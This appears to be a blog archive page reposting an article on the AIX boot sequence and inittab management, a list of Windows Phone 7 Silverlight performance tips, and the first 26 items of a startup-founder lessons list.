4/11/10

Speaking UNIX: Booting up

Discover how a UNIX machine boots

Adam Cormany (acormany@yahoo.com), National Data Center Manager, Scientific Games Corporation

Summary: Ever wonder what makes a computer tick or how a UNIX® server does what it does? For those who wonder what happens when you push the power button on your computer, here's your inside look. This article discusses the different boot types, managing the IBM® AIX® bootlist, and the AIX boot sequence. After reading this article, you should have a better understanding of what exactly is happening when your server starts.

Table of contents
* Introduction
* The AIX boot method
* The bootlist and how to manage it
* The AIX boot sequence
* The AIX kernel
* The /etc/inittab file
* Conclusion
* Resources
* About the author
* Comments

Introduction

The AIX operating system is the particular IBM flavor of UNIX. IBM first released AIX in 1986 as AIX version 1.0 and, through several iterations over the past 22 years (AIX version 6.1 was the latest version at the time of writing), AIX has matured into a solid UNIX system.

While many interchange the terms AIX and RS/6000, they are not the same thing. AIX is the UNIX operating system; IBM RS/6000® is the reduced instruction set computer (RISC) server hardware that AIX can run on. IBM initially launched AIX on the IBM 6150 RT workstation; through the years, AIX has progressed through IBM PS/2 Intel® 386 computers, IBM mainframes, and the POWER architecture. AIX now runs on IBM System p™ (formerly known as RS/6000) and System i™ (formerly known as IBM iSeries® and AS/400®) computers.
The AIX boot method

There are three ways to boot the AIX operating system: normal, stand-alone, and network boot.

Normal boot
The typical AIX boot method is the normal boot option. The normal boot option boots AIX from local disks to the server. When complete, the operating system will be in multi-user mode.

Stand-alone boot
The next type of boot on an AIX system is called the stand-alone boot, or maintenance mode option. The stand-alone boot option is similar to the normal boot option, but instead of being brought up in multi-user mode, the system is brought up in single-user maintenance mode. You can stand-alone boot an AIX system in several ways, such as booting the server from removable media (tape or CD), clicking F5 (or F6, depending on the hardware) after the keyboard has been initialized during the initial hardware peripheral checks, or a possible issue has been found (corrupt file system) and the system must be repaired prior to entering normal boot. Some systems may have a key that you can turn to maintenance mode, as well. Stand-along booting the server allows you to install software, correct issues, run diagnostics, and configure hardware without the presence of other users and reducing the risk of locked resources.

Network boot
The last type of boot is the network boot option. Again, similar to the normal boot option, the AIX system is booted into a multi-user mode. However, with this option, AIX receives its boot information from another server on the network.
The bootlist and how to manage it

Because you can boot AIX from several different types of media, you must have a way to manage the different types. This is where the bootlist comes into play. The bootlist maintains a list of all boot devices available to the system for each boot method.

To view a bootlist for a specific boot method, simply add the switch -o. In the following example, the normal boot method is displayed. The order the server will try to boot from is the first local disk (hdisk0), then by CD (cd0), and finally by tape (rmt0).
# bootlist -m normal -o
hdisk0
cd0
rmt0
To set the bootlist for a specific boot method, type the switch -m and the appropriate boot method followed by the desired boot devices. In the following example, the bootlist for a normal boot is altered to attempt to boot the server in the order of hdisk0, cd0, or cd1:
bootlist -m normal hdisk0 cd0 cd1
As you can see from the previous examples, the -m switch has been used each time to discern which boot method to modify or display. This option allows modification to normal, service (single-user maintenance mode), both (normal and service), and prevboot (the previous bootlist).

The AIX boot sequence
Now that you've selected the boot method, it's time to move to the actual sequence of events that occurs after the server is powered on.
Note: Throughout the rest of this article, you'll boot the server using normal boot mode.

POST
After you've turned on the power and the server is starting, the server's hardware is verified and checked for possible issues. This step is called power-on self-test (POST). While the server is running through its process, POST is checking the memory, keyboard, sound card, and network devices. During this time, if you wanted to enter stand-alone mode (single-user maintenance), you would click F5 or F6 after the keyboard has been initialized. However, in this article, no keystrokes are entered, and the server boots into its normal boot mode.

Bootstrap
After the POST process has finished, the bootstrap —or a smaller program used to load a larger program—is loaded into memory. The bootstrap then loads the Boot Logical Volume (BLV) into memory. After the BLV is loaded, the kernel takes over the boot process.

Boot Logical Volume and the bosboot command
The BLV is the location that contains AIX's bootable images. Typically, the BLV can be found on the local disk of the server. The BLV contains the AIX kernel, the rc.boot file, commands required during the boot process, and a trimmed-down version of the Object Data Manager (ODM).

To create bootable images, you use the bosboot command. Using bosboot, you create a boot file (that is, a bootable image) from a RAM disk, a file system, and a kernel. The bootable image is created along with interfaces with the server's boot Read-Only Storage (ROS) and Erasable Programmable Read-Only Memory (EPROM).

The following example shows how to create a bootable image on the default BLV on the local fixed disk from which the system boots:
bosboot -a

The AIX kernel
The AIX kernel stored in the BLV creates the / (root), /usr, and /var file systems in RAM. Keep in mind that these file systems as well as the kernel are stored in RAM initially during the operating system boot process. Because they are in RAM, they are not accessible to anything outside the BLV.

After the file systems have been loaded into RAM, the kernel executes the init process, which now takes over the boot process.

The init process
The AIX kernel loads the process init as process identifier (PID) 1. This process is the parent, or root, process to all other processes running on AIX. After the init process has been loaded and is running the boot process, init calls rc.boot.

The rc.boot file
The rc.boot file has three important cases of execution during the AIX boot-up process. The first section of rc.boot initializes the system's hardware to prepare it for the operating system to boot. A limited amount of devices needed to start the system are configured at this time with the Configuration Manager command cfgmgr.

During the second section of rc.boot, the file systems /, /usr, and /var as well as the paging space are mounted. After these file systems have been mounted, init is replaced with init on the disk as PID 1, and the RAM is cleared.

In the third and final section of rc.boot, the actual init process is executed from disk. When init is executed, the /etc/inittab file is read, and each item is executed. During this time, the /tmp file system is now being mounted to disk. Now that the system is in the last leg of the boot process, the cfgmgr command is run again on the remaining devices that were not configured in the first section of rc.boot.

The /etc/inittab file

After the init process has been executed, the next step is for init to open /etc/inittab and read each entry. The purpose of the /etc/inittab file is to deliver to the init process those processes that are started at boot-up and during normal operations.

The format of the /etc/inittab file is very specific, and each field is colon delimited. The format of the /etc/inittab is as follows:
ID:Run Level:Action:Command

The descriptions for the fields defined in the /etc/inittab file are:
* ID: A unique string that identifies the object.
* Run Level: Execute when the system has entered the init level. For example, if an entry in /etc/inittab is set to have a run level of 2, when the operating system enters init level 2, the command will be executed.

The init or run levels are different on AIX from other UNIX- or Linux®based systems. The following run levels are defined in AIX:
o Reserved for future operating system expansion
o 2: Default run level
o 3 through 9: User-definable
o a through c: Unique levels (When init is executed to a run level a, b, or c, processes are not killed. Processes in these run levels that are not running will be executed, but processes from the previous run level are not touched.)
o Q, q: A quick way to tell init to rescan the /etc/inittab file
* Action: The action field tells the init process how to treat the process in each respective entry in the inittab file. The following are values to the action field that AIX uses:
o respawn: If the process doesn't exist, start the process. Do not wait for its termination, and continue to scan the inittab file. If the process is terminated, restart it.
o wait: Start the process, and wait for its termination.
o once: Start the process, and do not wait for its termination. If the process is terminated, do not restart it.
o boot: Process the entry only during system boot.
o bootwait: Process the entry the first time the server goes from single-user to multi-user mode.
o powerfail: Only execute the command if init receives a power fail signal.
o powerwait: Only execute the command if init receives a power fail signal, and wait until the process terminates before continuing to scan the inittab file.
o off: If the process is currently running, send the signal SIGTERM, then SIGKILL in 20 seconds.
o ondemand: This value is the same as respawn but applies only to run levels a, b, and c.
o initdefault: Only scan the entry when init is initially executed.
o sysinit: Execute the entry before init accesses the console before login.
* Command: The final entry's field in the /etc/inittab is the command field. This is the actual command to execute if deems it necessary when has been initiated. When the command is ready to be executed, AIX will fork the process as sh -c exec .

The following example shows running a shell script named /usr/bin/rc.atc_bin when run level 2 has been initiated and respawn every other time run level 2 is called:
CORMANY_BIN:2:respawn:/usr/bin/rc.atc_bin

To disable the same script for run level 0, 1, 3, 6, and 9, use:
CORMANY_BIN:245780:respawn:/usr/bin/rc.atc_bin

Viewing and modifying the inittab
AIX has commands to make your life easier rather than manually changing the /etc/inittab file. The commands follow the same naming convention as other AIX commands:

* mkitab: Add records to the inittab file.
The following example adds the /usr/bin/rc.atc_bin script in the inittab with a run level 2.
mkitab “CORMANY_BIN:2:respawn:/usr/bin/rc.atc_bin”

* chitab: Changes records in the inittab file. The syntax is identical to the actual record in the inittab file.
The following example changes the previous example's /usr/bin/rc.atc_bin script in the inittab file to run level 3:
chitab "CORMANY_BIN:3:respawn:/usr/bin/rc.atc_bin"

* lsitab: List records in the inittab file. Using lsitab is a safe means of viewing the inittab records individually or all together.
The following example views all records in the inittab file:
lsitab -a
This example views only the record identified as CORMANY_BIN:
lsitab CORMANY_BIN

* rmitab: Remove records from the inittab file.
The following example removes the record identified by CORMANY_BIN from the inittab file:
rmitab CORMANY_BIN

Conclusion
Now that the inittab file has been read and all the proper processes have been executed, the system is at a login waiting for you! You may now log in to and enjoy your AIX system.

It may not seem like a lot when you press the power button on a server and it magically starts up, but as you can see, there's a lot to the AIX system when it is starting. Hopefully, by reading this article you have gained a new appreciation of what AIX has to go through to provide the base of a solid operating system.

Resources
Learn
* Speaking UNIX: Check out other parts in this series
* Wikipedia's AIX entry: Read Wikipedia's excellent entry on the AIX operating system for more information about its background and development.
* inittab file information: Learn more about the inittab file from the Combined IBM Systems Information Center.
* The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of IBM® AIX® systems administration and expanding your UNIX skills.
* New to AIX and UNIX? Visit the New to AIX and UNIX page to learn more.
* developerWorks technical events and webcasts: Stay current with developerWorks technical events and webcasts.
* AIX Wiki: Visit this collaborative environment for technical information related to AIX.
* Podcasts: Tune in and catch up with IBM technical experts.

Get products and technologies
* IBM trial software: Build your next development project with software for download directly from developerWorks.

Discuss
* Participate in the AIX and UNIX forums:
o AIX Forum
o AIX Forum for developers
o Cluster Systems Management
o IBM Support Assistant Forum
o Performance Tools Forum
o Virtualization Forum
o More AIX and UNIX Forums Sphere: Related Content

1/11/10

WP7 Development Tips Part 1

Performance is the area that we probably spend the most time on in all our apps. Building apps on the phone is just way different than building desktop apps. Things that might be really minor optimizations on a desktop Silverlight can really make a difference on desktop Silverlight apps.

Developing on the phone is an issue of economics where processing power is a scarce resource. You have to be conscious of the tradeoffs of using things like binding, layout controls, dependency injection, etc with their impact on performance. When I first started building phone apps I was excited to use nRoute and it’s nice features around MVVM/Resource Location/Messaging/Navigation. I wanted to have this really perfect loosely coupled architecture that used biding for everything/minimal code behind, had great designer support and dynamically resolved the proper services and models. In practice, that is not generally high performance code on the phone. If you are using some extra frameworks, really be conscious of the impact on performance and decide if you really need that architecture. What might work wonderfully on a more complicated desktop line of business app might not work as well on the phone. You just have to expect to write more optimization in a mobile app regardless if it’s the iphone, wp7 or android.

Silverlight was billed as “same Silverlight, just on the phone”. That is mostly true in terms of the api, but not necessarily true in terms of the actual runtime. It’s really a brand new runtime based on Silverlight 3 with some extra features added, so certain pieces of code might not have the same performance characteristics.

I’ve seen a lot of articles from various other people that talk about “buttery smooth scrolling” and other performance tips. At times the tips are a little too generalized. When you try to optimize something for performance on the phone, you really need to take into account your specific circumstances and find the right combination that works for your app. Always test and benchmark. Some things are more difficult to measure without real profiling tools, but do the best you can. Also be aware that scrolling in 3rd party apps on the phone is just not great at the moment. The native OS apps use a different UI framework that is going to make all but the simplest 3rd party apps feel sluggish so don’t feel too bad if your app scrolling seems slower. It’s probably not entirely your fault. Although this guy (around 8:50) seems to disagree. Sure 3rd party apps will get better with more experience and time, but the runtime needs to also get better. It’s the v1 of a new platform for everyone.

Finally, most of my thought are based around apps like twitter or facebook or other apps that require lots of live network data and have more complicated/longer list based screens. A 2 screen unit converter app is just going to be faster because it’s a simpler app and you don’t really need to optimize much.

So here are some things that you can try think about for your application:

•Data binding is always going to be slower than just directly setting a value. If you don’t have to databind, try to avoid it. I see lots of people going out of their way to MVVM everything and create bindable app bars. Feel free to just wire up a handler once in awhile or just directly set some text. There are other ways of centralizing code for reuse instead of trying to adhere to a strict pattern. If you are trying to animate in a screen and data bind simultaneously, most of the animations will get chopped. Just directly set enough pieces of data to have something to animate in and then you can do more intensive data binding after the animation is complete.
•As mentioned above – consider the tradeoff of always following the same pattern just for the sake of maintaining the pattern. Sure it might be easier to maintain, but high performance code doesn’t always look pretty. Be flexible, take shortcuts and do what makes sense for a specific part of the application. That’s not to say you should ever write bad code, just don’t focus on creating an architectural masterpiece in lieu of something that is performs well. The end user only sees what you put on screen, not the code behind it. They don’t really care that you used MEF and have an awesome messaging framework. When i see people over-engineer what should be a simple app just to adhere to some theoretical best practices I get sad.
•Converters slow your app. It’s better to just create the specific properties needed on your model. It’s minor optimization, but it adds up on the phone.
•Template expansion is slow. If you have a listbox where the item templates have lots of visibility converters, it’s going to be inefficient for a few reasons. First, you pay the perf hit of parsing a template for an item that is just going to be collapsed anyway. Plus you ran it through a bound converter which is slower. To optimize better you can do a few things:
◦If you can cut down visuals in a list, that is always the first place to start. If not every item in the list can use the same fixed template, consider making the list more of a summary and then link to a detail screen. The Twitter app does this nicely to avoid parsing hyperlinks in the text or showing attached photos. (because of how virtualizing stack panel works, it’s always better to have fixed height items that use the same template) Facebook on the hand parses text for hyperlinks which is slower because it need to reassemble the text in a wrap panel of multiple controls and the regexing is slow, but that is more in line with the user’s expectation of the facbeook experience.
◦If you have to have variable templates, make the list item a custom control and have the control dynamically create specific visuals needed for the list item so you don’t do extra layout work. Plus you eliminate converters and other extra data binding since you only have to bind one data property. Creating in code is faster than parsing the extra xaml. Obviously this comes at a maintenance penalty and you don't get designer support, but for those of us that don’t use blend or the designer view, not so much of an issue. Although inside your control you need to keep references to UI elements that you create and reuse as your entire control is recycled by the VSP. Otherwise you lose the benefit of caching that the listbox would normally do. Just make sure you are binding the list to a model that fires propertynotifiedchanged and you can hook that inside your control an update the UI elements as your control recycles.
◦It might seem crazy to not use xaml or databind but in places where we create most of the UI in code we get about 15-20% performance boost.
•Panoramas are slower than pivots because pivots only create the adjacent pivot items, while the pano creates all the items. Panos are nice, but consider the performance implications and don’t use unless there is a good UX reason. A lot of apps use a pano just because it’s there and looks cool but a pivot would probably make more sense and end up being faster.
◦To optimize the pano, defer loading of non-adject pano items. If you have 5 pano items, you only need to initially load the content in the first one and the 2nd one because those are visible on screen (and maybe the last if you want have data there as soon as the user pans backward from the first item) Defer loading of the content in the 3rd one until the user pans to the 2nd one or the 4th one (going in reverse). Same for the 4th one. You could be more extreme and fetch the data for the last one and not bind it until the user actually pans to it since it’s not actually visible when on the first pano item. The overall gains are going to depend on the complexity of the visuals you are loading. Try to keep it simple on the pano.
◦Pivots are more efficient because it only loads adjacent pivot items regardless of the total number of pivots. To improve startup even further, consider collapsing the content inside all but the initial pivot item to avoid even loading the adjacent ones on startup. On loading other pivot items you can uncollapse the content and let it data bind. You will still get the slide in animation. It will be slightly slower to see actual content, but you can overlay a simple loading message so the user sees something. This also improves responsiveness of clicking the pivot headers. We have been using a base page that has a Pivot property so any pages in the app set the pivot property and the base page takes care of uncollapsing the content.
•If you are using a progress bar, make sure you read this http://www.jeff.wilcox.name/2010/08/progressbarperftips2/
•Use HttpWebRequest over WebClient. WebClient always returns on the UI thread. Ideally you want to return on a background thread, do any parsing and then dispatcher begininvoke to bind on the UI thread.
•DataContractJsonSerializer is slower than Json.NET. Switching to Json.Net cut our JSON parsing time in half. That is almost insane. Ideally you want to do this on a background thread as mentioned above.
•If you can make network calls that have both JSON and XML responses, choose JSON. The size of the response is smaller which speeds up network calls and you can use the faster Json.net parser. Also try to return the minimum set of data needed.
•If you are serializing objects to isolated storage, consider implementing binary serialization instead of XML or JSON. It’s more work to maintain and pain to implement if you have complicated object graphs, but the performance difference is tremendous. In one of our apps going from DataContractSerializer to Json.NET to binary improved our iso cache deserialization from 7000ms to 3000ms to 300ms. If you want that data on startup it’s pretty much a necessity,
•Image downloading / decoding is basically kryptonite to a listbox. Binding a list of 100 items with thumbnail or other pictures will make your listbox fairly unresponsive and scrolling performance will be borderline unusable. Right now in the framework all image downloading is on the UI thread and decoding does not seem to be optimized as much as it could be. David Anson’s LowProfileImageLoader code is a must implement for this scenario. That will download all the images on a background thread and offloads everything that does not need to be done on the UI thread. One issue is that the Image control normally caches after it downloads. We have been adding extra code to keep a memory cache of the bitmap sources. Just make sure you put some cap on the size of the cache so it’s not using too much of your 90MB cap. We use 4MB. It' helps to limit the sizes of images that are memory cached. You can check the pixel width / height and only mem cache images under something like 200x200 . You can also cache images to iso storage after you download them. Maybe use that for larger images or ones that will not change over the course of a day. Like if you have a news reader app, there is no sense downloading the images for your top 10 stories every time you launch the app in a day. You will have to have some extra maintenance code so balance how frequently you need to fetch the same images vs the overhead of maintaining a disk cache. At a minimum you can cache large image for the lifetime of your app and just clear the directory on closing. Another optimization you can make is to hook scrolling events and pause the background download thread when scrolling a list. This helps scroll performance. If you are queue up images you might need to reverse the queue when you stop scrolling so the most recently added images load first.
•Try to use jpgs over pngs. The jpg decoder is much faster. Also try to avoid stretching images – if you control the image source, resize them before using in your app – you really don’t want the phone to do any more than it has to.
•When referencing images paths always use /Directory/filename If you omit the leading slash then the framework will do extra lookups
•For certain listboxes evaluate the difference between virtualizing and non-virtualizing stack panels. If you have a huge list you obviously need to use a virtualizing stack panel. Stackpanels have a slower startup time, but scrolling perf is goign to be better. Virtualizing stack panels create about 3 screens of data, but work best when it can fully recycle containers. If you have varying sized items and different containers you lose the benefits of virtualization and have worse scrolling. David Anson has some good code around using a stack panel instead of a virtualizing stack panel that gives you the best of both so see if that might be right for your app.
•If you use the tilt effect, make sure you turn on redraw regions and cache visualization to ensure it’s not adversely impacting your app. The tilt effect seems to invalidate the layout and slow down scrolling performance.
•Also be wary of context menu and the impact on scrolling perf. The runtime has to create the context menu control and attach all the bindings. Not that you shouldn’t use it, but just be aware that there are some performance implications.
•Layout is expensive. Make sure you use the simplest set of xaml to create the desired layout. Try not to nest lots of panels. If you can use canvases as much as possible and fix sized items. Help the runtime out, set a height / width if you can. Otherwise try to keep it to a single gird with multiple rows / columns. Nesting panels requires the layout engine to do more layout passes to measure. Especially on leaf nodes like items in a list box it’s best if you can use a fixed sized canvas. Extra/less efficient xaml that normally wouldn’t make a difference on the desktop has a much larger impact on the phone.
•Microsoft wants apps to run at 60fps on the compositor thread. That is a good goal but it is hard to achieve when a) the UI thread is easily bogged down with layout / binding which hurts the compositor thread perf and b) I’m not sure all the LG phones are even capable of 60fps. Realistically try to keep it as far above 30 as you can.
•Some people say to only use dispatcher.begininvoke when you must. I think there are times when you can use it to queue up visual changes that give the app a smoother appearance.
•Make sure your animations run on the GPU– only use transforms and opacity. If you add other animations in there it will force your storyboard off the compositor thread.
•Content in a popup is not hardware accelerated. If you try to animate stuff in a popup, it will be slow. If you need to mimic popup like functionality, consider re-templating the PhoneApplicationFrame to wrap the contentpresenter in a grid and place a contentpresenter below it to act as a placeholder for a fake popup. You can then write a popup manager to insert whatever child you previously had in a popup into the content presenter/fake popup. This allows you to have better perf on the content in the popup and you can have smoother animations for sliding / flipping the popup into place.
•For binding lists make sure you use observable collections. If you are refreshing a list make sure you merge in changes to minimize the amount of binding updates that occur. It’s more efficient to specifically update individual properties / items that have changed. In you model you can make sure propertynotified changed only occurs when the property has an updated value.
•Since updating large parts of the layout makes the UI somewhat unresponsive, try batching changes. For example if you bind a list to an observable collection, fetch data on a background thread, dispatcher 2 items into the collection, sleep for a few milliseconds and repeat. This will give the UI thread some time to better respond to input. The effect varies depending on your list. Sometimes it just further spreads out the layout cots and it’s worse. You really need to test on a device and determine what feels better. This code is a good example.
•Read the metro UI guidelines. WP7 has a refreshing distinct style. Let’s avoid bad iPhone ports aka the Android marketplace
•Always watch the memory counters. If you get close to 90MB you will have issues. At that point start removing any extra items you may be storing in memory.
•Design an application that requires the user to click the back button. If have a pano as your home screen, don't add buttons on other screens to jump back to that home screen unless you are going to programmatically call goback() until you get to that screen. (you could show some splash screen and do this, but i wouldn’t recommend the UX) The issue is that if you always forward navigate you will never clear the back stack and your app will run out of memory because the previous pages stick around. If you start navigating between panos with lots of textures your app will die quickly. Peter Torr has a post around determining what should be a new page which might cut down on page navigations an improve performance. Quick Rant: I really dislike the back button model most of the time. I think it imposes a navigation structure that doesn’t always make sense. If you have a tree structure like navigation, you can’t easily jump between leaf nodes and back to the root. There really needs to be a way to clear the back stack programmatically. Even web browsers allow you to return to any previous point in the back stack by long pressing the back button. The wp7 model forces you to click back through each page which is annoying in my opinion. Oh and the framework needs the ability to programmatically exit an app. Lots of apps require separate EULAs to use. Why can’t it exit if you don’t accept it?
•I know it’s still a little difficult to acquire a phone, but you have to test on a device. The performance characteristics are enormously different. Almost everything is WAY faster in the emulator.
•Always run through your app and check the fill rate. Try to keep it under 2.5. At 3.5 it will run like junk. If you fill rate is high, use this helper by Dave Relyea (I think it was from him) to dump out the visual tree and see what is contributing to the fill rate. You just need to call TreeHelper.Dump() and it will output the visual tree to the console window along with it’s texture size. You can import this into Excel and sort to find any items that might be contributing unnecessarily to fill rate.
•If you are using system themes you can further optimize the fill rate – just make sure you don’t paint a background at all. That will drop your fill rate by 1. If you want an app to always be black or white, you can put something on app startup to detect the system theme like:
public static Theme GetTheme(this Application application) { var visibility = (Visibility)Application.Current.Resources[PhoneLightThemeVisibility]; return (visibility == Visibility.Visible) ? Theme.Light : Theme.Dark; }Then if the theme is white and you want your app to be white, you don’t have to paint a background and vice versa. To do this I have been painting the background on the root frame. This has the added benefit of not displaying the OS background if you are turnstiling pages in/out. Silverlight should really let you tell the OS what background to paint for your app. It has to paint something. It might as well paint the background color you want.

•Set the app bar opacity to .99 to avoid seeing the OS background bleed through when the app bar animates on/off the screen. Since an app bar with opacity of 1 bumps up the client area, you will see the OS background when the app bar animates away on page transitions. If you do this, you will need to add an prevent the layout root from extending into the app bar space or add a spacer element at the bottom. (Otherwise your content will go under the app bar and you will see it through the opacity. plus it will prevent the bottom most content from scrolling onto the screen. Might seem like a hassle, but I think it looks terrible when an app bar on a dark theme phone animates away and you see this giant black bar for a second.
•Lots of people say don’t use maps in panos/pivots. I think it’s fine as long as they aren’t enabled else the gesture interaction is weird. One issue is that the map is drawn differently than other Silverlight controls so it will render over other content if you have it in a scrollviewer. In that case you can let the map render and on the mapresolved event, take a writable bitmap of the map, remove the map from the visual tree and replace with the image of the map.
•The map control that shipped in the release SDK crashes all the time. Definitely update to one released a few days ago. I don’t know how anyone used it before.
•The web browser launcher tombstones your app and really ruins the UX of your app if you just want to view a quick web page. Consider overlaying in a web browser control and adding and app bar button to open in IE. That or make a setting to either open links in IE or in the app. Or use the long press gesture on a hyperlink to open in IE otherwise open in the app.
•If you want to opt out of system theming, make sure you look at the resources in %ProgramFiles%\Microsoft SDKs\Windows Phone\v7.0\Design\ to clone the font styling and templates to match the default styles but with your own colors.
•The default template for the pivot control doesn’t match the OS style. It should be PhoneFontSizeMedium, PhoneFontFamilySemiBold
•In most of our network calls we have two callbacks, one for cached data and one for live data. Our data services maintain a dictionary cache of the results/ request path, return the cached result, get the new data, update the cache and then return the new results. We then merge the the refreshed callback into the observablecllection with the cached data. This allows screens to load faster on subsequent calls.
•On navigating back to page, you don’t have to rebind / reload data unless you did something on the previous page that requires an update.
•Set all images in your app to be content instead of resources so they are not loaded at startup. This will improve startup performance.
•Regardless of what anyone says, “buttery smooth” scrolling like the native apps is nearly impossible to achieve in silverlight at the moment. If you make a listbox of 200 hard coded textblocks and flick up and down quickly, the screen will just flash and not render content. Either virtualizing stack panel has some issues buffering or the garbage collector is kicking in and causing issues. I’m sure it will get fixed soon, but it’s an issue to be aware of. The only real way to fix the problem is to only have short lists with minimal templates and ideally no images.
•Textblocks with opacity = 0 causes performance problems. You really should avoid that in listboxes.
•If you use the GPS, create a singleton class to instantiate the geowatcher and keep it around. Rather than disposing, just turn it on/off.
•If you have really long lists, consider virtualizing the data. Shawn Oster has a good post on that. If you look at the marketplace on the phone it downloads about 20 items and then downloads more when you scroll to the bottom of the list. This will make the list load faster initially and cuts down on downloading / rendering data that might not be needed. Another option is to add a load more button at the bottom of the list.
•It’s really important to minimize work on the UI thread as much as possible since the touch recognition happens on the UI thread and will get dropped if the processor is maxed out. Don’t do anything on the UI thread that is not directly related to setting / manipulating a UI element. Well you can do some things, but really try to background as many chunks of work as you can.
•Some apps like the people hub scroll the header with the list and have a footer. If you try to retemplate listbox and insert a header and footer around the itemscontrol inside the scrollviewer, you will lose virtualization. There are a few ways you can accomplish this while maintaining virtualization.
◦Easiest is to bind to a list/collection of object and insert dummy items for the header and footer. You can then inherit from listbox and make you own that has a template property for header and footer. In PrepareContainerForItemOverride you can check if it’s a header / footer object and apply the right template.
◦If you don’t want to create all these collections with dummy objects, you could internalize the collection to you own listbox. Instead of binding your normal collection to itemssource, add a new proprty called datasource, bind to that and hook into the collection changed events to mirror the changes in your own internal collection. Then you can bind that internal collection and add your own header / footer items to the collection. This also allows you to easily add some “Loading data” message or “No data” message.
◦Talking to some other people, I have learned that this might not be very performant because it breaks some of the container recycling. The alternative is to not override PrepareContainerForItemOverride and instead have one template and change the visibility on the non header/footer items. This is one of those things that you have to try out and see for yourself.
•Focus in making the app respond to input as soon as possible. You need to do something immediately when the user takes some action. If the content will take some time to load, at least transition to it and display a loading indicator. An example would be a popup that slides in with a list of items. If the list is somewhat complex and does not render immediately, there ill be a noticeable lag between the user action and the response. Slide up the list with a header and loading indicator, then data bind the list. It will feel more responsive.
•I wrote previously about transitions. You should design the app with transitions in mind and be conscious of why certain animations are useful for context and perceived performance. It does seem like this should be easier to do since animation is a big part of the metro design.
•Spend some time to review the hit targets of your elements. 40x40 seems to accommodate an adult finger reasonable well. Remember to keep a reasonable mount of spacing between hit areas. You really need to think about this when designing an application. With a mouse you can click on a specific point. On the phone you need to account for the size of your finger. You want to avoid having users click the wrong things, navigating to a screen , then having to navigate back.
•If you have a pivot with 4 items and you save the selected index on tombstoning you can’t always set the selected index immediately in OnNavigatedTo. The pivot creates the first, 2nd and last items. Setting the selected index to the 3rd pivot will throw an exception. If you have more than 3 pivots and you need to set the selected index, grab the index of of the page state in onnavigatedto, store in a variable and set it in the page loaded event.
•You can always check PhoneApplicationService.Current.StartupMode == Activated to check whether you are returning from a tombstone. The whole concept of tombstoning could be my least favorite #wp7dev feature besides the navigation framework and scrolling performance. I really don’t understand why this is something developers should have to worry about. If the phone wants to tombstone my app, put it back the way it was when you’re done. Also be aware when launchers/choosers are going to tombstone your app or any other side effects when returning from them.
•There are lots of different keyboard layouts (SIP). Use the right one for your text entry needs. You can optimize for web addresses, email, phone numbers, text (for dictionary suggestions) and search. One thing is that the search key is not super obvious in my opinion. You can use the app bar to augment the SIP by adding more specific buttons like upload photo, etc.
•There is currently no socket support so implementing something like a chat client is difficult. *cough* facebok chat *cough *
•If you want your pages to load quickly, don’t do anything before the first layout updated event after loaded is fired. Then defer loading things until they need to be shown.
•There is no launcher for the bing maps app. If you want to display driving directions you need to call the virtual earth web service to get the data (or whatever other map service you might prefer)
•There is also no compass api, no direct camera access (so therefore no augmented reality unless you are a handset maker like LG and have native code access), no Bluetooth api, no ability to add events to the system calendar, no video chooser (thus no ability to upload videos in your app), no ability to customize alert dialogs to match your app if you opt out of theming, no ability to run in the background (you can have your app run under the lock screen though), no copy paste (coming soon and hopefully 3rd party app support), no ability to alter the back stack, no gif decoding support (try ImageTools if you need to display gifs). I’m probably missing a few things that i would like to use but are not not supported. Despite all that, I’d still rather use visual studio / c# than Xcode/obj-c I do think the silverlight team did a great job getting it on the phone. It really is one of the better frameworks for building UX centric apps and the silverlight team has been really helpful in tracking down issues we’ve encountered.
I’ll be at PDC if anyone would like to chat about #wp7dev Sphere: Related Content

57 things Jason Goldberg learned founding 3 tech companies

The wise would read his words well.

I’ve been founding and helping run technology companies since 1999. My latest company is fabulis.com. Here are 57 lessons I’ve learned along the way. I could have listed 100+ but I didn’t want to bore you.

1. Build something you are personally passionate about. You are your best focus group.

2. User experience matters a lot. Most products that fail do so because users don’t understand how to get value from them. Many product fail by being too complex.

3. Be technical. You don’t have to write code but you do have to understand how it is built and how it works.

4. The CEO of a startup must, must, must be the product manager. He/she must own the functional user experience.

5. Stack rank your features. No two features are ever created equal. You can’t do everything all at once. Force prioritization.

6. Use a bug tracking system and religiously manage development action items from it.

7. Ship it. You’ll never know how good your product is until real people touch it and give you feedback.

8. Ship it fast and ship it often. Don’t worry about adding that extra feature. Ship the bare minimum feature set required in order to start gathering user feedback. Get feedback, repeat the process, and ship the next version and the next version as quickly as possible. If you’re taking more than 3 months to launch your first consumer-facing product, you’re taking too long. If you’re taking more than 3 weeks to ship updates, you’re taking too long. Ship small stuff weekly, if not several times per week. Ship significant releases in 3 week intervals.

9. The only thing that matters is how good your product is. All the rest is noise.

10. The only judge of how good your product is is how much your users use it.

11. Therefore (adding #’s 9 + 10): In the early days the key determinant of your future success is traction. Spend the majority of your time figuring out how to cultivate pockets of traction amongst your early adopters and optimize around that traction. Traction begets more traction if you are able to jump on it.

12. You’re doing really well if 50% of what you originally planned on doing turns out to actually work. Follow your users as much as possible.

13. But don’t rely on focus groups to tell you what to build. Focus groups can tell you what to fix and help you identify potentially interesting kernels for you to hone in on, but you still need to figure out how to synthesize such input and where to take your users.

14. Most people really only heavily use about 5 to 7 services. If you want to be an important product and a big business, you will need to figure out how to fit into one of those 5 to 7 services, which means capturing your user’s fascination, enthusiasm, and trust. You need to give your users a real reason to add you into their time.

15. Try to ride an existing wave vs. creating your own market. If you can, catch onto an emerging macro trend and ride it.

16. Find yourself a “sherpa.” This is someone who has done it before — raised money, done deals, worked with startups. Give this person 1 to 2% of your company in exchange for their time. Rely on them to open doors to future investors. Use them as a sounding board for corporate development issues. Don’t do this by committee. Advisory boards never amount to much. Find one person, make them your sherpa, and lean on them.

17. Work with the best possible people for your project, regardless of where they are located.

18. Co-locate as best possible but be willing to travel to remote offices to make multiple offices work. Online collaboration maxes out at 3 to 4 weeks apart, which means you need to commit to traveling almost monthly to make remote offices work.

19. Work with people you like to be around. There’s no sense in going to war with people you don’t like.

20. Work with people you trust like family.

21. Work from home as long as you can.

22. Position your desk in a way in which you are staring at your co-founders and they are staring at you. If you aren’t enjoying looking at each other each day, you’re working with the wrong people.

23. Use a tool like Yammer to share internally what you’re working on. It’s easier for many people (especially developers) to post a status update than to write an email.

24. Use a file sharing service like basecamp for your team. It’s impossible for everyone to keep track of every file sent to their email in-box. Use basecamp so there’s a history and central repository.

25. Figure out quickly what you are personally really good at and focus your personal time around those activities. Let other people do the other stuff.

26. Surround yourself with people who fill your gaps. Let them do the stuff they are better at. Don’t do their jobs.

